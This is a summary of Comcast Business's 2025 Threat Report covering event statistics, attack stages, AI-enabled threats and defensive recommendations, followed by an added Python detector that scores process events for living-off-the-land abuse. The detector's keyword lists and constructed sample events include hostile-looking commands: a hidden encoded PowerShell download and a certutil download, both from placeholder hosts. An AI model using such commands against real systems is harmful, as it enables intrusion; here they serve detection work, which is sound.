Comcast Business’s 2025 Threat Report analyzes 34.6 billion events (including 19.5B botnet resource-development events, 9.7B drive-by compromises, 4.7B phishing attempts, and 44,069 DDoS events) to map evolving attacker tactics such as proxy abuse, living-off-the-land techniques, and AI-enabled social engineering. It urges organizations to adopt multi-layered, AI-augmented defenses—prioritizing patching, phishing-resistant MFA, proactive threat hunting, and managed 24/7 SOC services—to reduce exposure and build enterprise resilience. #SocGholish #ComcastBusiness
Key points
- Typical report structure: foreword, executive summary, threat landscape narrative, key data findings, recommended security framework (the “Cybersecurity Prism”), attack-stage mapping tied to MITRE ATT&CK®, SOC case studies, recommendations, and vendor/solution brief (How Comcast Business Can Help).
- Foreword and executive summary: set strategic context—AI and automation reshape both attacks and defense; people remain central to resilience; security is a board-level business risk.
- Threat landscape and methodology sections: describe data sources, mapping to MITRE ATT&CK®, timeframes (June 1, 2024–May 31, 2025), and the blend of Comcast Business telemetry, partner research, and analyst insights used to derive findings.
- Attack-stage chapters: organized into four stages (Identifying Targets & Testing Defenses; Establishing a Foothold; Digging Deeper & Expanding Reach; Playing Out the Endgame) with specific MITRE tactics and sub-techniques highlighted for each phase.
- Key statistics: 34.6 billion events analyzed; 19.5 billion botnet/resource-development events; 9.7 billion drive-by compromise events; 4.7 billion phishing events; 44,069 DDoS events observed; CVEs rising to 40,077 in 2024; 16.7% YoY surge in automated global scanning; workforce gap of ~4.76M and 67% of organizations reporting staffing shortages.
- Notable trend — industrialized resource development: attackers heavily invest in pre-attack setup (domains, SSL, VPS/bulletproof hosting, IAB purchases) and use botnets at massive scale to scan and refine campaigns before payload delivery.
- Notable trend — AI as risk multiplier and defensive accelerator: generative AI (LLMs) lowers attacker skill barriers (e.g., WormGPT-like tooling), enabling higher-volume, more convincing phishing, vishing with voice cloning, and automated malware generation; defenders also deploy AI/ML for anomaly detection and orchestration.
- Evolving initial access vectors: drive-by compromise (T1189) emerges as a top initial access method (nearly 9.8B events), complemented by large-scale phishing (4.7B events) across email, SMS, voice, and collaboration platforms.
- Living-off-the-land (LOTL) and stealthy post-compromise activity: attackers increasingly abuse legitimate OS tools (PowerShell, WMI, command interpreters) and valid accounts to evade signature-based controls and extend dwell time.
- Proxy abuse and masked infrastructure: widespread use of compromised residential devices, botnets, and cloud services as proxy layers (“residential proxies”) to obfuscate origin and enable scalable, rented or sold access.
- DDoS evolution: trend toward short-burst, high-velocity reconnaissance attacks and “carpet bombing” campaigns that spread traffic across many IPs/subnets to stealthily probe defenses; examples include many attacks lasting seconds to minutes (e.g., 405 events
- Recurring weakness — security fundamentals: unpatched systems, open ports, misconfigurations, stale accounts, and poor credential hygiene remain primary enablers for attackers; strong patching, risk-based vulnerability management, and timely deprovisioning are emphasized.
- Human element and workforce constraints: alert fatigue and staffing shortages (67% of orgs reporting gaps) increase risk; investment in automation, AI-augmented MDR, and analyst enablement is essential to reduce burnout and improve detection/response quality.
- Commoditization of attack capabilities: malware-as-a-service, IAB marketplaces, and turnkey tools (including AI-assisted code) mean attackers can rapidly scale operations without deep internal expertise.
- Detection and response priorities: defenders should combine preventative controls (patching, secure email/web gateways, posture management, phishing-resistant MFA) with advanced detection (EDR/NDR), AI-driven behavioral analytics, proactive threat hunting, and 24/7 SOC/MDR to reduce mean time to detect and contain.
- Risk and governance implications: recommend aligning cybersecurity investments to prioritized business risks, applying an AI-aware risk calculus, governing enterprise AI/shadow AI use, and elevating cyber to board-level oversight to balance acceptance, mitigation, and transfer decisions.
- Actionable takeaways: adopt multi-layered defenses (network, cloud, endpoint, identity), enforce phishing-resistant MFA and credential hygiene, implement risk-based vulnerability management, monitor for proxy/IOCs and unusual process behavior, and consider managed SOC/MDR to offset staffing gaps and accelerate response.
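The living-off-the-land pattern above (legitimate interpreters such as PowerShell and WMI abused after compromise) and the takeaway to monitor for unusual process behavior are the kind of thing a SOC turns into a behavioral rule rather than a signature. The following is an added illustration, not code from the Comcast Business report or any of its products: a small rule-based scorer for process-creation events. The event schema (parent, image, cmdline), the indicator list, and the sample events are constructed assumptions for the example; a real deployment would draw on EDR telemetry and a maintained rule set.

```python
"""Added example: score process-creation events for living-off-the-land (LOTL)
indicators. Schema and sample events are constructed for illustration and are
not the report's data or a real product format."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent: str    # parent process image name, e.g. "winword.exe" (assumed field)
    image: str     # created process image name, e.g. "powershell.exe" (assumed field)
    cmdline: str   # full command line as captured (assumed field)


# Built-in binaries commonly abused post-compromise; illustrative, not exhaustive.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe", "wscript.exe",
           "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# PowerShell's -EncodedCommand and its short aliases, followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_FLAG = re.compile(r"-w(indowstyle)?\s+hidden")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Count independent LOTL indicators on one event; higher means more suspicious."""
    reasons: List[str] = []
    image, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()

    # Office documents launching a script host is a classic phishing follow-on.
    if image in LOLBINS and parent in OFFICE_PARENTS:
        reasons.append("office application spawned a scripting/LOLBin host")
    # WMI provider host spawning an interpreter indicates WMI-based execution.
    if parent == "wmiprvse.exe" and image in LOLBINS:
        reasons.append("WMI provider host spawned an interpreter")
    # Encoded commands hide intent from simple string matching; decode and inspect.
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        low = decoded.lower()
        if any(k in low for k in ("downloadstring", "invoke-webrequest", "iex", "invoke-expression")):
            reasons.append("decoded payload fetches or evaluates remote content")
    # certutil/bitsadmin used as downloaders rather than for their intended purpose.
    if image in {"certutil.exe", "bitsadmin.exe"} and ("urlcache" in cl or "/transfer" in cl):
        reasons.append("LOLBin used as a file downloader")
    # Flags that suppress the window and profile are common in stealthy execution.
    if HIDDEN_FLAG.search(cl) or "-nop" in cl or "-noprofile" in cl:
        reasons.append("PowerShell window/profile suppression flags")
    return len(reasons), reasons


def _enc(ps: str) -> str:
    """Helper to build a sample -EncodedCommand value (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; hosts/URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\notes.txt"),
    ProcEvent("WINWORD.EXE", "powershell.exe",
              "powershell.exe -nop -w hidden -enc "
              + _enc("Invoke-WebRequest http://placeholder.invalid/a.ps1")),
    ProcEvent("WmiPrvSE.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("cmd.exe", "certutil.exe",
              "certutil.exe -urlcache -split -f http://placeholder.invalid/x.bin x.bin"),
]


def triage(events: List[ProcEvent], threshold: int = 1) -> List[Tuple[ProcEvent, int, List[str]]]:
    """Return events whose indicator count meets the threshold, highest score first."""
    hits = [(ev, *score_event(ev)) for ev in events]
    return sorted((h for h in hits if h[1] >= threshold), key=lambda h: -h[1])


if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"[{score}] {ev.parent} -> {ev.image}: {'; '.join(reasons)}")
```

A score threshold of one flags three of the four constructed events; in practice the weighting, the parent/child pairs, and the keyword list would come from the organization's own baseline, and decoded command content should be logged alongside the alert so analysts do not have to re-derive it during triage.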
Source: Awesome Annual Security Reports - The reports in this collection are limited to content which does not require a paid subscription, membership, or service contract. (https://github.com/jacobdjwilson/awesome-annual-security-reports/)